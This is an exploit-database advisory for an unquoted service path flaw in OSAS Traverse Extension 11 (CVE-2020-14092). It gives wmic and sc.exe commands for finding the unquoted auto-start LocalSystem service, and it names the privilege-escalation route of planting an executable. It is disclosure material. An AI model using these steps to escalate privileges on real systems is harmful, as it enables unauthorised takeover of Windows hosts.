OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path

vendor:

Traverse Extension

by:

Tech Johnny

9.8

CVSS

CRITICAL

Unquoted Service Path

CWE

Product Name: Traverse Extension

Affected Version From: 11 x86

Affected Version To: 11 x86

Patch Exists: YES

Related CWE: CVE-2020-14092

CPE: o:osas:traverse_extension:11

Metasploit: N/A

Other Scripts: N/A

Platforms Tested: Windows 2012R2

2020

OSAS Traverse Extension 11 – ‘travextensionhostsvc’ Unquoted Service Path

The OSAS Traverse Extension 11 contains a vulnerability in the 'travextensionhostsvc' service, which is installed with the default configuration and is set to auto-start. The service binary path is not quoted, which allows a local attacker to gain elevated privileges by placing a malicious executable in the same folder as the service binary.

Mitigation:

To mitigate this vulnerability, administrators should ensure that all service paths are quoted.

Source

Exploit-DB raw data:

# Exploit Title: OSAS Traverse Extension 11 - 'travextensionhostsvc' Unquoted Service Path
# Exploit Auth: Tech Johnny
# Vendor Homepage: https://www.osas.com
# Version: 11 x86
# Tested on: Windows 2012R2

Details:

C:\Windows\system32>wmic service get name, pathname, displayname,
startmode | findstr /i "Auto" | findstr /i /v "C:\Windows\\" | findstr
/i /v """

TRAVERSE Automation Service TravExtensionHostSvc C:\Program Files\Open
Systems, Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe Auto

C:\Windows\system32>sc.exe qc travextensionhostsvc
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: travextensionhostsvc
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START (DELAYED)
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files\Open Systems,Inc\TRAVERSE\TRAVERSE.Host.CustomExtensions.exe
LOAD_ORDER_GROUP : TAG : 0
DISPLAY_NAME : TRAVERSE Automation Service
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem